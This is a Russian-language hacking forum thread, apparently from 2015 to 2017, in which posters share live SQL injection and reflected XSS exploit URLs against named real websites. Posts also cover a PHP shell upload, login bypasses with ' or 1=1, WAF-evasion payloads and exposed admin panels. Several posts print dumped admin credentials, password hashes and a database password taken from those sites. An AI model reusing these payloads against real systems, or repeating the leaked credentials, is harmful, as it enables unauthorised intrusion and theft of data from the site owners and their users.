5.5.42-MariaDB-cll-lve
Make Free Bitcoin
http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f
AR 149,492
5.5.42-37.1
Трафф 140K
SMS PARIAZ - Accueil
Joomla кому надо,добьет
http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10, 11,12--+f
PR 2
AR 322,679
5.6.23
Трафф 120K
DDShadoww
22.09.2015, 21:42
Target:220-volt.ru
Type:XSS Reflected
www.220-volt.ru/search/?q=confirm(1)
tipa_cracker
25.09.2015, 07:34
Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...
ocheretko
25.09.2015, 14:27
↑ (https://antichat.live/posts/3894822/)
Мне кажется что тут (
http://www.girlplays.ru/
) уязвимости в поисковике
0
...
Так и есть.
$P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin | rusakov1971@inbox.ru
Method: POST
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x71706 26a71),1342,1342,1342,1342,1342,1342#&submit_s=
define('DB_USER', 'root');
define('DB_PASSWORD', '89039486893');
define('DB_HOST', 'localhost');
Target:
_ttp://good-steam.ru/backup.zip .
.
Type:Backup .
Target:salrium.ru
Type : XSS - Reflected .
salrium.ru/resp_block.php?id_goods=1728083">alert("WH")
или вот так
http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25% 3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2 .
Можно и так salrium.ru/resp_block.php?id_goods=">alert("WH")
Target:_ttp://steam-extra.ru/listing.php?category_id=40049
Type:XSS-Reflected
">alert("WH")
или
'"()&%prompt(916773)
Или свой .
Target: http://www.archetype.co.uk/search.php
Type:XSS-Reflected
">alert("OOPS")
Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска
↑ (https://antichat.live/posts/3899117/)
Target:
http://www.archetype.co.uk/search.php
Type:XSS-Reflected
">alert("OOPS")
Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска
Вы правы:
Target: archetype.co.uk
Type:SQLi error based
Exploit:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user )))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
DB-name: archetyp_db
DB-user: archetype
Version: 5.1.73-cll
P.S. Возможно есть более изящное решение, но у меня получилось так
UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
Target: http://www.gaspforair.org
Уязвимость:SQLi
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x0 0) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONC AT(0x20,@x,userlevel,0x3a,username,0x3a,password,0 x3c62723e))))x),3,4,5--
Target: http://www.sequentialtart.com
Уязвимость:SQLi
http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELEC T(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users) WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,passw ord,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24--
Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history (http://www.gaspforair.org/.bash_history) и http://www.sequentialtart.com/.mysql_history (http://www.gaspforair.org/.mysql_history)
чО уж там, /etc/shadow надо в общий доступ!)))
Добавлю:
Target: http://yrmusic.com
Уязвимость:SQLi
http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(s elect+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c6 93e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Target: http:http://www.zam.it
Уязвимость:SQLi
http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATA BASE(),VERSION()),3,4,5,6,7,8,9,10 --
Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))
Target: http:http://sh.newsun.dk
Уязвимость:SQLi
http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS( 0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
DUS Architects Amsterdam
Type:SQLi
http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f
ТИЦ 20
PR 5
5.6.23-LOG
DDShadoww
22.10.2015, 01:48
Target: http://motivtelecom.ru
Type: XSS Reflected
motivtelecom.ru/sverdlovsk-oblast/search?search_text=">alert(1)
YogaBugs
Type : SQLi
http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10, 11--+f
PR 3
5.5.44-0ubuntu0.14.04.1
Redirect
blagoveshchensk-amur.websender.ru/redirect.php?url=http://вашсайт/
partop.ru/redirect.php?url=http://вашсайт/
.
budennovsk.g-o-r-o-d.ru/url.php?url=http...
XSS-Reflected
">alert()
Сайт : _ttp://hibiny.com/
В поисковике .
XSS-Reflected
Url:
_ttp://ntagil.rutaxi.ru/index.html?state=closedialog
Жмём "Дополнительные параметры",ищем строку "№ корп.ка" и вводим туда свой скрипт . В моём случае
">alert()
и скрипт сразу срабатывает . Вбивается под строкой "Дополнительные параметры" .
UNION query
http://www.alda-europe.eu/newSite/project_dett.php?ID=ID=-8135%20UNION%20ALL%20SELECT%205511,5511,5511,5511, 5511,5511,5511,5511,5511,5511,version(),5511,5511, 5511,5511,5511,5511,5511,5511,5511,5511,5511,5511, 5511,5511#
5.0.92-enterprise-gpl-log
тиц 30
pr 6
XSS-Reflected .
Сайт:_ttp://stranasp.ru
">alert()
joelblack
06.11.2015, 01:14
target: http://www.bankmtb.ru/ (http://www.unifinbank.ru/)
type: XSS Reflected
Строка поиска:
">alert(1337)
target: http://www.transstroybank.ru
type: XSS Reflected
Строка поиска:
">alert('Hello')
private_static
06.11.2015, 23:56
Target:gismeteo.ru
Type:XSS Reflected
ТИЦ:23k
http://informer.gismeteo.ru/html/getinformer_new.php?tnumber=1&city0=4980Кишиневalert("xss")&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=2&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1
Ссылка : _ttp://www.golovastik.ru (http://www.golovastik.ru) .
Тип : XSS-Reflected .
">alert()
вводится в поисковике .
VLS | Сервер деревенской жизни
SQLi
http://villagelifeserver.ru/pack.php?ID=-4%27%20union%20select%201,group_concat(ID,0x3a,UUI D,0x3a,nick,0x3a,password,0x3a,sex,0x3a,status),3, 4,5,6,7,8,9,10,11,12,13%20FROM%20users--+f
ТИЦ 10
AR 558,485
Octavian
31.12.2015, 19:30
Arbitrary file upload
http://piatalipcani.md/ro/add_anunt.php
Заливаем через картинку shell.phtml
Получяем http://piatalipcani.md/img_anunt/shell.phtml
Octavian
31.12.2015, 19:43
Phpmyadmin без пароля
http://ctice.md:8082/phpmyadmin
ФЛЕШКА )
http://maestro.md/
blackhead
04.01.2016, 13:53
http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),versio n(),4+--
DORTEKARREBAEK_@10.246.64.149
5.5.47-MariaDB-1~wheezy
http://www.afmec.org/admin/index.php?msg=alert("LOL")
http://www.trex.uqam.ca/index.php?action=alert("LOL")
Meghalaya Board of School Education
SQLi
http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_na me),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f
PR 3
AR 796,284
5.5.36-cll
http://websurf.ru/signup.php
Поле: Ваше имя
">alert('HakNet')
http://id.ykt.ru/page/register
Поле: Ник в сети Ykt.Ru
">alert('HakNet')
http://lawyerstars.ru/
Во все поля
">alert('Ph03niX')
blackhead
13.01.2016, 14:12
1. Target: courtnews.co.nz PR 3
Type: SQLi
http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--
hooked_hooked@localhost
5.1.73-cll
На сайте есть блог wp, можно попробовать украсть куки через XSS
http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C65727428 2758585827293C2F7363726970743E,3+--
2. Target:beloboka.ru (http://beloboka.ru) ТИЦ 60
Type: SQLi
http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--
beloboka@localhost
5.6.19-log
Админка http://beloboka.ru/beloboka/cp
Пароль и логин в базе. В админке есть возможность залить любой файл.
Шниперсон
31.01.2016, 21:09
Type: SQLi
http://www.banknotymira.ru/?nav=pozition&id=-6074'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12, 13'-- -
http://www.banknotymira.ru/admin
admin - login
15182 - password
bkmir_u43895@localhost
nordwarrior
31.01.2016, 21:18
SQL-i
http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,conc at_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,1 4,15,16,17,18,19+from+wp_users--
XSS-reflected:
http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//
http://www.oldtown-apartments.com/index.php?cat=1 and (select 1 from (Select count(*),Concat((select user()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)&id=14
http://dlib.statistics.gr/portal/pa...les?p_topic=10007369&p_cat=10007369&p_catage= (http://dlib.statistics.gr/portal/page/portal/ESYE/yeararticles?p_topic=10007369&p_cat=10007369&p_catage=)alert(123);
http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20
5.5.43-0+deb7u1
http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0
Егорыч+++
07.04.2016, 16:51
↑ (https://antichat.live/posts/3971239/)
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)
' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0
этот сайт как пособие везде используется, так что не пойдет
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28% 29,7--+-
5.0.83
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28 %29,7--+-
teamboad
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29, 7--+-
teamboad@172.20.245.62
Егорыч+++
14.04.2016, 21:32
↑ (https://antichat.live/posts/3973713/)
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28% 29,7--+-
5.0.83
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28 %29,7--+-
teamboad
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29, 7--+-
teamboad@172.20.245.62
уже заезжанный сайт
kingbeef
15.04.2016, 15:29
↑ (https://antichat.live/posts/3971239/)
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)
' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0
Может запретить такие ссылки?
Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.
Человек закинул ссылки в программу и она кучей их проверяет.
При публикации даже [t] не убирают.
https://site.ua/search/?searchStrin...al(name)+background=javascript:eval (name)//>" (https://site.ua/search/?searchString=javascript%3A%2F*--%3E%3C%2Fmarquee%3E%3C%2Fscript%3E%3C%2Ftitle%3E%3 C%2Ftextarea%3E%3C%2Fnoscript%3E%3C%2Fstyle%3E%3C% 2Fxmp%3E%22%3E[img%3D1]%3Cimg+-%2Fstyle%3D-%3Dexpression%26%2340%26%2347%3B%26%2342%3B%E2%80% 99%2F-%2F*%26%2339%3B%2C%2F**%2Feval%28name%29%2F%2F%26% 2341%3B%3Bwidth%3A100%25%3Bheight%3A100%25%3Bposit ion%3Aabsolute%3Bbehavior%3Aurl%28%23default%23VML %29%3B-o-link%3Ajavascript%3Aeval%28title%29%3B-o-link-source%3Acurrent+name%3Dalert%281%29+onerror%3Deva l%28name%29+src%3D1+autofocus+onfocus%3Deval%28nam e%29+onclick%3Deval%28name%29+onmouseover%3Deval%2 8name%29+background%3Djavascript%3Aeval%28name%29% 2F%2F%3E%22)
kingbeef
15.04.2016, 21:11
↑ (https://antichat.live/posts/3974092/)
https://site.ua/search/?searchString=javascript:/*-->">[img=1]" (https://site.ua/search/?searchString=javascript%3A%2F*--%3E%3C%2Fmarquee%3E%3C%2Fscript%3E%3C%2Ftitle%3E%3 C%2Ftextarea%3E%3C%2Fnoscript%3E%3C%2Fstyle%3E%3C% 2Fxmp%3E%22%3E[img%3D1]%3Cimg+-%2Fstyle%3D-%3Dexpression%26%2340%26%2347%3B%26%2342%3B%E2%80% 99%2F-%2F*%26%2339%3B%2C%2F**%2Feval%28name%29%2F%2F%26% 2341%3B%3Bwidth%3A100%25%3Bheight%3A100%25%3Bposit ion%3Aabsolute%3Bbehavior%3Aurl%28%23default%23VML %29%3B-o-link%3Ajavascript%3Aeval%28title%29%3B-o-link-source%3Acurrent+name%3Dalert%281%29+onerror%3Deva l%28name%29+src%3D1+autofocus+onfocus%3Deval%28nam e%29+onclick%3Deval%28name%29+onmouseover%3Deval%2 8name%29+background%3Djavascript%3Aeval%28name%29% 2F%2F%3E%22)
Там вроде и фильтров нету...
↑ (https://antichat.live/posts/3974216/)
Там вроде и фильтров нету...
alert()
фильтрует
kingbeef
15.04.2016, 22:26
↑ (https://antichat.live/posts/3974219/)
alert()
фильтрует
https://site.ua/search/?searchString=alert() (https://site.ua/search/?searchString=%3C/title%3E%3Cscript%3Ealert%28%29%3C/script%3E)
Не фильтрует
Octavian
19.04.2016, 20:57
http://vic.md/ro/notebook/list/all/...VERSION(),225,26,27,28,29,30,31,32+AND+(1)=(1 (http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,USER(),15,16,17,18,19,20,21,22,23,VER SION(),225,26,27,28,29,30,31,32+AND+(1)=(1)
Дальше не смог вывести пользователеи.В ЛС кто сделает это )
BabaDook
19.04.2016, 22:06
http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from infor mation_schema.tables where table_schema=database () limit 81,1),0x3a,floor(rand(0)*2))y from in formation_schema.tables group by y ) x)+AND +(1)=(1 #
AND+(1)=(1 это не нужно. Просто 9999 без )
http://takky-shop.ru/images/img/log.txt
Открытый лог .
Reflected XSS
http://takky-shop.ru/category/">alert()
http://takky-shop.ru/search
в поисковике тоже XSS .
10minutemail.com
XSS
Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)
BabaDook
23.08.2016, 02:26
Да эти ХСС даже уязвимостью назвать нельзя
https://www.crazymailing.com хсс
Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
Первое, авторизовываемся не через телефон, а средствами забытого пароля:
http://s011.radikal.ru/i315/1609/c6/28939a6c873c.png
Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
http://s008.radikal.ru/i304/1609/4b/7adf49899ecc.png
Далее тупо перебираем скриптом в консоле
[CODE]
for (var i = 800000; i
BabaDook
25.10.2016, 21:30
http://newipnow.com/
в ПОЛЕ URL В ВОДИМ 127.0.0.1:3306
S.S.R.F.
Octavian
29.11.2016, 17:17
http://new-semkino.ru/cp/login
http://rio-holding.ru/cp/login
http://stzem.ru/cp/login
http://buro.moscow/cp/login
http://rek-on.ru/cp/login
http://kolomnalnd.ru/cp/login
http://vodny-2.ru/cp/login
http://kutuzovo.club/cp/login
http://2112211.ru/cp/login
http://serveing.ru/cp/login
http://svus.ru/cp/login/
http://galilei-house.ru/cp/login
http://www.smartlab.ru/cp/login
http://l-vm.ru/cp/login
http://gavangroup.ru/cp/login
http://an-megapolis.ru/cp/login
В Логине " or 1=1 --
http://image.prntscr.com/image/d4458b80ae514659a869ceb7880079c1.png
http://golden-bird.biz/signup
login=">alert(/xss/)&email=1@email.com&pass=password&repass=password
MrFear41
12.12.2016, 16:17
Exploit :
Boolean Based SQL Injection
http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
Обход WAF (Mod_Security)
http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,user(),6,7,8,9,10,11--+
USER():slighter_sgAdmin@localhos
http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,/*!CONVERT*/(/*!12345GrOuP_CoNcAT(name,0x3a,password)*/ USING latin1),6,7,8,9,10,11 /*!12345from*/ admins--+
Name:misty,slighter,sgadmin
Password:svD1A0JC5ggN,C4XTZLtTlTUg,C4XTZLtTlTUg
SQL injec.
Scott County CDA
http://www.scottcda.org/page.php?id=-16 union select 1,group_concat(email,0x3a,password),3,4,5,6 from admin--+
http://www.nhlegendsofhockey.com/news.php?id=-65+union+select+all+1,2,3,4,5,6,7,8,9,10
SQL INJECTIONProviding Turnkey Solutions To Automotive Industry
http://www.nashgroup.co.in/about.php?catid=-5 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9--+
nashgrou_user@localhost : nashgrou_dbnew : 5.5.52-cll
http://www.nashgroup.co.in/about.php?catid=-5 union select 1,concat(username,0x3a,userpass),3,4,5,6,7,8,9 from tbladmin--+
orangedc:XCIJIlczVnYEIFAxAG8MPQ==
SQL INJECTION DRONES LAB
https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX
droneslab@localhost : droneslab_website : 10.1.18-MariaDB
USER_PRIVILEGES:droneslab'@'localhost' -> NO
Firefox
http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert( document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0% D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
http://image.prntscr.com/image/1d5818eb11eb45e1abed87f9e93c695f.png
leksadin
10.02.2017, 04:53
Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
http://takky-shop.ru/images/img/log.txt
LOG .
↑ (https://antichat.live/posts/4047322/)
Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot